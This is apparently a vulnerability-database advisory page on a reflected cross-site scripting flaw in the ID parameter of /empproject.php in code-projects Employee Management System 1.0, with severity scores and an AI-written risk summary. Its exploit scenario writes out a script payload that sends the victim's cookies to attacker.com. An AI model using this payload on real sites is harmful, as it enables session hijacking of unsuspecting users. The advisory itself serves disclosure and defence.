EUVD-2026-31626
GHSA-hj9g-6j3g-57m4
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
A vulnerability has been found in code-projects Employee Management System 1.0. Affected by this issue is some unknown functionality of the file /empproject.php. The manipulation of the argument ID leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
AnalysisAI
Reflected cross-site scripting in code-projects Employee Management System 1.0 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser by manipulating the ID parameter of /empproject.php. A publicly available proof-of-concept exploit exists on GitHub, lowering the barrier to exploitation, though user interaction is required to trigger the payload. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that a victim user click or load a crafted URL - user interaction is mandatory (UI:P in the CVSS 4.0 vector), meaning fully automated, one-click-free exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 2.1 reflects a genuinely low-severity finding: the attack vector is network (AV:N), complexity is low (AC:L), no privileges are required (PR:N), but user interaction is mandatory (UI:P), and the confidentiality and availability impacts are none (VC:N/VA:N), with only limited integrity impact (VI:L). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a deployment of Employee Management System 1.0, crafts a URL targeting `/empproject.php` with a malicious JavaScript payload injected into the `ID` parameter (e.g., `ID=<script>document.location='https://attacker.com/?c='+document.cookie</script>`), and delivers this URL to a target employee via phishing email or message. When the victim clicks the link and their browser loads the page, the injected script executes in the application's origin context, allowing the attacker to exfiltrate session cookies or perform actions on behalf of the victim. … |
| Remediation | No vendor-released patch has been identified at time of analysis; the code-projects vendor has not published a security advisory or patched release. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today